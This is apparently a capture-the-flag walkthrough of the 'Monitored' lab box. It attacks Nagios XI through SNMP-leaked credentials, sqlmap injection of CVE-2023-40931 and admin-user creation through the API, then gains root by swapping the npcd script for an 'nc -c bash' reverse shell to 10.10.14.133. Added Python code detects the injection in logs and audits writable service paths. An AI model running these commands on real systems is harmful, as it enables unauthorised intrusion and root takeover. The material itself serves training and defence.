Monitored

OS: Linux
Difficulty: Medium
Points: 30

Nmap

TCP Scan

ports=$(nmap -p- --min-rate=5000 -T4 10.10.11.248 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -vvv -p "$ports" -sC -sV -oN nmap.txt 10.10.11.248
Nmap scan report for 10.10.11.248
Host is up, received syn-ack ttl 63 (0.072s latency).
Scanned at 2024-01-18 10:22:57 EST for 22s

PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA)
|   256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA)
|   256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519)
80/tcp   open  http       syn-ack ttl 63 Apache httpd 2.4.56
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Did not follow redirect to https://nagios.monitored.htb/
389/tcp  open  ldap       syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   syn-ack ttl 63 Apache httpd 2.4.56 ((Debian))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/localityName=Bournemouth/emailAddress=support@monitored.htb
| Issuer: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/localityName=Bournemouth/emailAddress=support@monitored.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-11-11T21:46:55
| Not valid after:  2297-08-25T21:46:55
| MD5:   b36a:5560:7a5f:047d:9838:6450:4d67:cfe0
| SHA-1: 6109:3844:8c36:b08b:0ae8:a132:971c:8e89:cfac:2b5b
| tls-alpn: 
|_  http/1.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Nagios XI
5667/tcp open  tcpwrapped syn-ack ttl 63
Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

UDP Scan

nmap -v -sU --min-rate=5000 10.10.11.248
Nmap scan report for monitored.htb (10.10.11.248)
Host is up (0.25s latency).
Not shown: 988 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
22/udp    closed ssh
123/udp   open   ntp
161/udp   open   snmp

Enumeration

We add the hosts to our /etc/hosts file (appending, so the existing entries are kept).

echo "10.10.11.248    monitored.htb nagios.monitored.htb" >> /etc/hosts

A Nagios service is found on port 443.

https://nagios.monitored.htb/nagiosxi/login.php

Fuzzing directories, we find nagios.

gobuster dir -u https://nagios.monitored.htb/ -w /usr/share/wordlists/dirb/common.txt -k

The application shows a basic authentication prompt.

Nothing relevant was found so far, but there are open UDP ports.


SNMP

snmp-check 10.10.11.248 -c public

We find a username and password.

svc : XjH7VCehowpR1xZB

The credentials work for accessing https://nagios.monitored.htb/nagios/.

If we try to authenticate through the portal, it shows the following message.

NagiosXI API Auth

It is possible to authenticate through the API.

curl -k -X POST 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=500'
{"username":"svc","user_id":"2","auth_token":"8550145cd6d8e5ab3170f873717c86b816778f05","valid_min":500,"valid_until":"Fri, 19 Jan 2024 16:20:02 -0500"}

NagiosXI SQL Injection (CVE-2023-40931)

Nagios XI has a SQL injection vulnerability (CVE-2023-40931) in the id parameter of banner_message-ajaxhelper.php.

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=8550145cd6d8e5ab3170f873717c86b816778f05" -p id

Dump the database:

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=5b08bdcb90ebf9a8e10492ccb134e6e90810b9ee" -p id -D nagiosxi -T xi_users -C email,username,api_key,password --dump
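As an added detection example (not part of the original writeup), the following Python flags requests to the banner_message-ajaxhelper.php endpoint whose id parameter is not a plain integer, the probing pattern behind CVE-2023-40931, over constructed Apache combined-format access-log lines; the IPs, timestamps and the token value are made up.

```python
"""Added detection example (not from the writeup): flag requests to the Nagios XI
banner_message-ajaxhelper.php endpoint whose id parameter is not a plain integer,
the probing pattern behind CVE-2023-40931, in Apache combined-format access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines; addresses, timestamps and the token value are made up.
SAMPLE_LOG = """\
10.10.14.133 - - [19/Jan/2024:10:31:02 -0500] "GET /nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=TOKEN HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.10.14.133 - - [19/Jan/2024:10:31:03 -0500] "GET /nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3%27&token=TOKEN HTTP/1.1" 200 12 "-" "sqlmap/1.7"
10.10.14.133 - - [19/Jan/2024:10:31:04 -0500] "GET /nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3%20AND%201%3D1&token=TOKEN HTTP/1.1" 200 12 "-" "sqlmap/1.7"
10.10.14.20 - - [19/Jan/2024:10:32:00 -0500] "GET /nagiosxi/login.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Apache combined format: src ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TARGET_SCRIPT = "banner_message-ajaxhelper.php"


def find_sqli_probes(lines):
    """One finding per request to the vulnerable helper whose id is not all digits.
    parse_qs URL-decodes the value, so encoded quotes and spaces are caught too."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/" + TARGET_SCRIPT):
            continue
        for raw_id in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            if not re.fullmatch(r"\d+", raw_id):
                findings.append({"src": m.group("src"), "time": m.group("ts"),
                                 "id": raw_id, "status": m.group("status")})
    return findings


if __name__ == "__main__":
    for f in find_sqli_probes(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['src']} non-numeric id={f['id']!r} status={f['status']}")
```

sqlmap can also send the parameters in a POST body, which the default Apache access log does not record; covering that case needs request-body logging or a WAF in front of the application rather than this log check.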

NagiosXI API Key

With the API key we can create a new admin user.

curl -k -X POST "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=doom&password=doom&name=doom&email=doom@monitored.htb&auth_level=admin"
{
    "success": "User account doom was added successfully!",
    "user_id": 10
}

Now we can access the admin panel.

NagiosXI Command Execution

To execute commands we proceed as follows.

Go to:

  • Configure -> Core Config Manager
  • Commands -> Add new

Now we create a service that uses the command.

  • Monitoring -> Services -> Add new

We run the command and get a reverse shell.

Privilege Escalation

We have sudo privileges on several commands.

We escalate using manage_services.sh on the npcd service.

nagios@monitored:~$ sudo /usr/local/nagiosxi/scripts/manage_services.sh status npcd
● npcd.service - Nagios Process Control Daemon
     Loaded: loaded (/etc/systemd/system/npcd.service; enabled; vendor preset: enabled)
     Active: active (running) since Fri 2024-01-19 08:53:47 EST; 2min 13s ago
   Main PID: 19615 (npcd)
      Tasks: 2 (limit: 4661)
     Memory: 976.0K
        CPU: 15ms
     CGroup: /system.slice/npcd.service
             ├─19615 /bin/bash /usr/local/nagios/bin/npcd -f /usr/local/nagios/etc/pnp/npcd.cfg
             └─19616 bash -i

This works because the npcd binary is owned by nagios:

nagios@monitored:~$ find / -name npcd 2>/dev/null
/usr/local/nagios/bin/npcd
nagios@monitored:~$ ls -la /usr/local/nagios/bin/npcd
-rwxr-xr-x 1 nagios nagios 54 Jan 19 08:45 /usr/local/nagios/bin/npcd

We run the following commands to get a reverse shell as root.

rm /usr/local/nagios/bin/npcd
echo -e '#!/bin/bash\nnc -c bash 10.10.14.133 4444' > /usr/local/nagios/bin/npcd
chmod +x /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
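Defensive counterpart, added here and not part of the original writeup: a Python audit that reads a systemd unit, collects every path on its ExecStart= line (including a script run through an interpreter, as with /bin/bash .../npcd above) and reports the ones the service account could write or replace before a sudo-allowed wrapper starts the unit as root. demo() builds a constructed unit and script in a temp directory standing in for the real npcd.service; the uid/gid arguments and the file layout are assumptions.

```python
"""Added audit example (not from the writeup): ExecStart paths of a systemd unit that an
unprivileged service account could overwrite or replace before a sudo-allowed wrapper
(like manage_services.sh) starts the unit as root."""
import os
import stat
import tempfile
from pathlib import Path


def exec_start_paths(unit_text):
    """All absolute paths on ExecStart= lines, arguments included, so an interpreter
    wrapper like '/bin/bash /usr/local/nagios/bin/npcd -f cfg' exposes the script."""
    paths = []
    for line in unit_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "ExecStart":
            for tok in value.split():
                tok = tok.lstrip("-@+!:")  # systemd exec prefixes
                if tok.startswith("/"):
                    paths.append(tok)
    return paths


def writable_by(path, uid, gid):
    """Mode-bit check (not os.access), so root can audit on behalf of another account."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    m = st.st_mode
    return bool((st.st_uid == uid and m & stat.S_IWUSR)
                or (st.st_gid == gid and m & stat.S_IWGRP) or m & stat.S_IWOTH)


def audit_unit(unit_path, uid, gid):
    """(path, reason): 'file' if uid/gid can write it, 'dir' if it can rm and recreate it."""
    findings = []
    for p in exec_start_paths(Path(unit_path).read_text()):
        if writable_by(p, uid, gid):
            findings.append((p, "file"))
        elif os.path.exists(p) and writable_by(os.path.dirname(p), uid, gid):
            findings.append((p, "dir"))
    return findings


def demo():
    """Constructed unit and wrapped script in a temp dir, audited for the current account
    (standing in for the nagios user); returns the script path and the findings."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "npcd")
    Path(script).write_text("#!/bin/bash\nexec sleep 1\n")
    os.chmod(script, 0o755)  # rwxr-xr-x owned by us, like the npcd on the box
    unit = os.path.join(d, "npcd.service")
    Path(unit).write_text(f"[Service]\nExecStart=/bin/bash {script} -f /nonexistent/npcd.cfg\n")
    return script, audit_unit(unit, os.getuid(), os.getgid())
```

On a real host, call audit_unit('/etc/systemd/system/npcd.service', uid, gid) with the service account's ids; any 'file' or 'dir' finding means the wrapper is starting code that account controls.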

References

https://support.nagios.com/forum/viewtopic.php?f=16&t=58783
https://www.nagios.org/ncpa/help/2.2/api.html
https://outpost24.com/blog/nagios-xi-vulnerabilities/